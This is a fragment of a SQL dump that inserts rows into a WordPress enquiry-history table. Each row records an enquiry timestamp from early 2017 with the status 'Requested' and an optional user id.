INSERT INTO `wp_enquiry_history` VALUES (381, 381, '2017-01-08 01:04:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (382, 382, '2017-01-08 01:04:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (383, 383, '2017-01-08 01:10:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (384, 384, '2017-01-08 03:42:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (385, 385, '2017-01-08 06:26:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (386, 386, '2017-01-08 22:02:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (387, 387, '2017-01-09 00:23:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (388, 388, '2017-01-09 16:07:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (389, 389, '2017-01-09 18:36:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (390, 390, '2017-01-09 20:32:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (391, 391, '2017-01-09 23:02:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (392, 392, '2017-01-10 01:07:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (393, 393, '2017-01-10 05:32:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (394, 394, '2017-01-10 11:44:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (395, 395, '2017-01-10 15:55:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (396, 396, '2017-01-10 16:08:15', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (397, 397, '2017-01-10 17:43:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (398, 398, '2017-01-10 18:26:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (399, 399, '2017-01-10 20:14:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (400, 400, '2017-01-10 22:11:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (401, 401, '2017-01-10 23:31:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (402, 402, '2017-01-11 12:14:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (403, 403, '2017-01-11 19:16:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (404, 404, '2017-01-12 21:08:13', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (405, 405, '2017-01-12 22:06:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (406, 406, '2017-01-15 14:31:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (407, 407, '2017-01-16 15:05:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (408, 408, '2017-01-18 08:44:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (409, 409, '2017-01-18 15:43:05', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (424, 424, '2017-01-25 14:56:15', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (411, 411, '2017-01-19 18:59:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (412, 412, '2017-01-20 22:15:45', '-', 'Requested', 372); 
INSERT INTO `wp_enquiry_history` VALUES (413, 413, '2017-01-21 07:17:00', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (425, 425, '2017-01-25 14:56:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (426, 426, '2017-01-25 16:19:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (427, 427, '2017-01-25 16:25:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (428, 428, '2017-01-25 16:52:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (429, 429, '2017-01-25 17:26:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (430, 430, '2017-01-25 18:11:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (431, 431, '2017-01-25 19:29:14', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (432, 432, '2017-01-25 19:30:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (433, 433, '2017-01-25 19:54:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (434, 434, '2017-01-25 20:28:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (435, 435, '2017-01-25 20:31:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (436, 436, '2017-01-25 20:42:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (437, 437, '2017-01-26 12:53:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (438, 438, '2017-01-26 13:57:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (439, 439, '2017-01-26 14:52:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (440, 440, '2017-01-26 15:46:20', '-', 'Requested', 392); 
INSERT INTO `wp_enquiry_history` VALUES (441, 441, '2017-01-26 18:14:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (442, 442, '2017-01-26 22:29:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (443, 443, '2017-01-27 02:14:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (444, 444, '2017-01-27 17:26:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (445, 445, '2017-01-28 15:37:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (446, 446, '2017-01-30 03:05:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (447, 447, '2017-01-30 15:56:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (448, 448, '2017-01-30 16:28:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (449, 449, '2017-01-30 17:09:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (450, 450, '2017-01-30 17:19:28', '-', 'Requested', 400); 
INSERT INTO `wp_enquiry_history` VALUES (451, 451, '2017-01-30 17:33:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (452, 452, '2017-01-30 18:56:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (453, 453, '2017-01-30 19:33:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (454, 454, '2017-01-31 20:06:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (455, 455, '2017-02-01 14:34:53', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (456, 456, '2017-02-01 14:35:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (457, 457, '2017-02-01 16:39:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (458, 458, '2017-02-01 16:42:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (459, 459, '2017-02-01 18:56:27', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (460, 460, '2017-02-01 19:28:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (461, 461, '2017-02-01 19:34:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (462, 462, '2017-02-01 20:15:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (463, 463, '2017-02-01 20:21:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (464, 464, '2017-02-01 20:38:05', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (465, 465, '2017-02-02 16:02:00', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (466, 466, '2017-02-02 16:36:37', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (467, 467, '2017-02-02 17:37:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (468, 468, '2017-02-02 19:07:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (469, 469, '2017-02-03 15:17:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (470, 470, '2017-02-03 17:39:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (471, 471, '2017-02-03 18:12:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (472, 472, '2017-02-03 18:23:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (473, 473, '2017-02-03 18:25:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (474, 474, '2017-02-03 18:25:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (475, 475, '2017-02-03 20:27:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (476, 476, '2017-02-04 15:27:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (477, 477, '2017-02-05 18:26:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (478, 478, '2017-02-06 11:27:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (479, 479, '2017-02-06 13:28:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (480, 480, '2017-02-06 16:21:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (481, 481, '2017-02-06 18:16:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (482, 482, '2017-02-06 21:25:10', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (483, 483, '2017-02-07 16:18:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (484, 484, '2017-02-07 16:21:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (485, 485, '2017-02-07 16:25:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (486, 486, '2017-02-07 18:27:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (487, 487, '2017-02-07 19:19:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (488, 488, '2017-02-07 21:27:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (489, 489, '2017-02-07 22:06:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (490, 490, '2017-02-08 01:26:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (491, 491, '2017-02-08 09:01:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (492, 492, '2017-02-08 15:30:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (493, 493, '2017-02-08 16:07:30', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (494, 494, '2017-02-08 18:18:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (495, 495, '2017-02-09 13:54:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (496, 496, '2017-02-09 22:47:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (497, 497, '2017-02-09 23:00:51', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (498, 498, '2017-02-10 15:40:37', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (499, 499, '2017-02-10 15:41:46', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (500, 500, '2017-02-10 15:42:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (501, 501, '2017-02-10 18:56:46', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (502, 502, '2017-02-10 21:57:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (503, 503, '2017-02-10 23:28:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (504, 504, '2017-02-10 23:44:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (505, 505, '2017-02-11 06:42:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (506, 506, '2017-02-11 06:45:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (507, 507, '2017-02-12 06:57:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (508, 508, '2017-02-13 14:16:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (509, 509, '2017-02-13 15:21:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (510, 510, '2017-02-13 23:13:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (511, 511, '2017-02-14 05:32:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (512, 512, '2017-02-14 13:05:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (513, 513, '2017-02-14 13:06:14', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (514, 514, '2017-02-14 13:15:13', '-', 'Requested', 449); 
INSERT INTO `wp_enquiry_history` VALUES (515, 515, '2017-02-14 15:46:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (516, 516, '2017-02-14 15:53:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (517, 517, '2017-02-14 18:04:08', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (518, 518, '2017-02-14 19:42:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (519, 519, '2017-02-14 22:10:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (520, 520, '2017-02-15 12:28:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (521, 521, '2017-02-15 19:39:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (522, 522, '2017-02-15 20:28:46', '-', 'Requested', 455); 
INSERT INTO `wp_enquiry_history` VALUES (523, 523, '2017-02-15 23:15:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (524, 524, '2017-02-16 00:30:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (525, 525, '2017-02-16 14:13:45', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (526, 526, '2017-02-16 15:46:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (527, 527, '2017-02-17 02:11:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (528, 528, '2017-02-17 14:41:48', '-', 'Requested', 361); 
INSERT INTO `wp_enquiry_history` VALUES (529, 529, '2017-02-17 15:14:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (530, 530, '2017-02-17 16:01:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (531, 531, '2017-02-17 16:21:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (532, 532, '2017-02-17 16:55:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (533, 533, '2017-02-17 19:57:07', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (534, 534, '2017-02-17 21:22:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (535, 535, '2017-02-18 22:53:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (536, 536, '2017-02-19 11:49:03', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (537, 537, '2017-02-20 10:11:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (538, 538, '2017-02-20 15:41:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (539, 539, '2017-02-20 15:42:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (540, 540, '2017-02-20 15:43:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (541, 541, '2017-02-20 15:43:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (542, 542, '2017-02-20 15:43:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (543, 543, '2017-02-20 19:11:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (544, 544, '2017-02-20 21:57:46', '-', 'Requested', 471); 
INSERT INTO `wp_enquiry_history` VALUES (545, 545, '2017-02-20 22:31:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (546, 546, '2017-02-21 14:22:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (547, 547, '2017-02-21 15:52:56', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (548, 548, '2017-02-21 16:08:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (549, 549, '2017-02-21 16:41:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (550, 550, '2017-02-21 17:07:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (551, 551, '2017-02-21 17:11:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (552, 552, '2017-02-21 17:21:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (553, 553, '2017-02-21 19:10:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (554, 554, '2017-02-21 19:42:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (555, 555, '2017-02-22 02:14:51', '-', 'Requested', 476); 
INSERT INTO `wp_enquiry_history` VALUES (556, 556, '2017-02-22 02:18:51', '-', 'Requested', 476); 
INSERT INTO `wp_enquiry_history` VALUES (557, 557, '2017-02-22 17:14:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (558, 558, '2017-02-22 18:36:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (559, 559, '2017-02-22 22:37:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (560, 560, '2017-02-23 01:41:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (561, 561, '2017-02-23 03:36:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (562, 562, '2017-02-23 14:50:12', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (563, 563, '2017-02-23 15:14:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (564, 564, '2017-02-23 16:08:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (565, 565, '2017-02-23 17:53:42', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (566, 566, '2017-02-23 19:40:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (567, 567, '2017-02-23 22:42:38', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (568, 568, '2017-02-24 15:03:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (569, 569, '2017-02-24 15:13:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (570, 570, '2017-02-24 16:49:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (571, 571, '2017-02-24 16:51:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (572, 572, '2017-02-24 20:51:26', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (573, 573, '2017-02-24 23:20:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (574, 574, '2017-02-26 17:52:11', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (575, 575, '2017-02-27 11:10:51', '-', 'Requested', 496); 
INSERT INTO `wp_enquiry_history` VALUES (576, 576, '2017-02-27 13:50:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (577, 577, '2017-02-27 14:01:22', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (578, 578, '2017-02-27 20:05:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (579, 579, '2017-02-28 16:55:37', '-', 'Requested', 2); 
INSERT INTO `wp_enquiry_history` VALUES (580, 580, '2017-02-28 17:26:33', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (581, 581, '2017-02-28 17:32:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (582, 582, '2017-02-28 19:43:54', '-', 'Requested', 500); 
INSERT INTO `wp_enquiry_history` VALUES (583, 583, '2017-03-01 04:12:02', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (584, 584, '2017-03-01 14:22:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (585, 585, '2017-03-01 17:45:06', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (586, 586, '2017-03-01 18:00:43', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (587, 587, '2017-03-01 18:36:21', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (588, 588, '2017-03-02 13:09:51', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (589, 589, '2017-03-02 14:33:57', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (590, 590, '2017-03-02 19:22:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (591, 591, '2017-03-02 19:22:30', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (592, 592, '2017-03-02 19:45:59', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (593, 593, '2017-03-03 16:56:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (594, 594, '2017-03-03 18:50:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (595, 595, '2017-03-03 19:19:32', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (596, 596, '2017-03-03 19:30:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (597, 597, '2017-03-04 16:45:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (598, 598, '2017-03-05 18:57:39', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (599, 599, '2017-03-06 02:21:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (600, 600, '2017-03-06 09:54:15', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (601, 601, '2017-03-06 10:14:24', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (602, 602, '2017-03-06 11:10:33', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (603, 603, '2017-03-06 11:13:42', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (604, 604, '2017-03-06 11:17:10', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (605, 605, '2017-03-06 13:15:10', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (606, 606, '2017-03-06 13:21:23', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (607, 607, '2017-03-06 13:25:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (608, 608, '2017-03-06 13:57:21', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (609, 609, '2017-03-06 16:37:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (610, 610, '2017-03-06 17:12:28', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (611, 611, '2017-03-06 17:54:54', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (612, 612, '2017-03-06 17:57:33', '-', 'Requested', 511); 
INSERT INTO `wp_enquiry_history` VALUES (613, 613, '2017-03-06 19:09:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (614, 614, '2017-03-07 01:30:25', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (615, 615, '2017-03-07 02:15:54', '-', 'Requested', 1); 
INSERT INTO `wp_enquiry_history` VALUES (616, 616, '2017-03-07 09:21:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (617, 617, '2017-03-07 13:01:20', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (618, 618, '2017-03-07 13:17:49', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (619, 619, '2017-03-07 14:58:17', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (620, 620, '2017-03-07 15:35:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (621, 621, '2017-03-07 18:54:47', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (622, 622, '2017-03-07 21:09:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (623, 623, '2017-03-08 07:26:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (624, 624, '2017-03-08 08:19:53', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (625, 625, '2017-03-08 14:14:40', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (626, 626, '2017-03-08 19:17:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (627, 627, '2017-03-08 20:55:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (628, 628, '2017-03-08 21:04:55', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (629, 629, '2017-03-08 21:05:24', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (630, 630, '2017-03-08 21:06:25', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (631, 631, '2017-03-08 23:47:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (632, 632, '2017-03-09 04:39:14', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (633, 633, '2017-03-09 18:16:16', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (634, 634, '2017-03-09 23:10:01', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (635, 635, '2017-03-10 00:43:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (636, 636, '2017-03-10 02:29:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (637, 637, '2017-03-10 11:22:34', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (638, 638, '2017-03-10 13:12:47', '-', 'Requested', 491); 
INSERT INTO `wp_enquiry_history` VALUES (639, 639, '2017-03-10 15:40:35', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (640, 640, '2017-03-10 16:19:50', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (641, 641, '2017-03-10 18:01:18', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (642, 642, '2017-03-10 18:57:44', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (643, 643, '2017-03-13 03:10:13', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (644, 644, '2017-03-13 03:49:29', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (645, 645, '2017-03-13 13:06:58', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (646, 646, '2017-03-13 15:01:31', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (647, 647, '2017-03-13 15:52:36', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (648, 648, '2017-03-13 16:12:09', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (649, 649, '2017-03-13 17:36:19', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (650, 650, '2017-03-14 00:45:41', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (651, 651, '2017-03-14 08:05:48', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (652, 652, '2017-03-15 15:02:04', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (653, 653, '2017-03-15 22:45:54', '-', 'Requested', NULL); 
INSERT INTO `wp_enquiry_history` VALUES (654, 654, '2017-03-16 03:01:16', '-', 'Requested', 547); 
